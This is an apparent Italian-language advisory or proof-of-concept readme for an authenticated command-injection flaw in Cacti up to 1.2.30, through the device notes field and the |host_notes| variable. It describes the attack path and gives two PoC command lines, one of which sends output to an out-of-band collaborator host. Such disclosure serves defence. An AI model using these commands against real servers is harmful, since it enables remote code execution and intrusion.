
Cacti ≤ 1.2.30 Auth RCE - Iniezione di variabili host
Una vulnerabilità di iniezione di comandi del sistema operativo in Cacti ≤ 1.2.30 consente a qualsiasi utente autenticato con permessi di creazione di dispositivi e template di grafici di eseguire comandi arbitrari sul server sottostante. Il difetto esiste perché i campi di metadati host controllati dall'utente (in particolare il campo note del dispositivo) vengono sostituiti negli argomenti della riga di comando di RRDtool tramite il motore di sostituzione delle variabili di Cacti senza alcuna sanitizzazione o escape. Un attaccante può iniettare metacaratteri di shell nel campo note, creare un template di grafico che faccia riferimento alla variabile |host_notes| e attivare il rendering del grafico per ottenere la piena esecuzione remota di codice come utente del server web.
python3 cacti_rce_poc.py --url http://target/cacti --user admin --pass admin --cmd 'id'
Esecuzione di comandi OOB:
python3 cacti_rce_poc.py --url http://target/cacti --user admin --pass admin --oob your.oastify.com
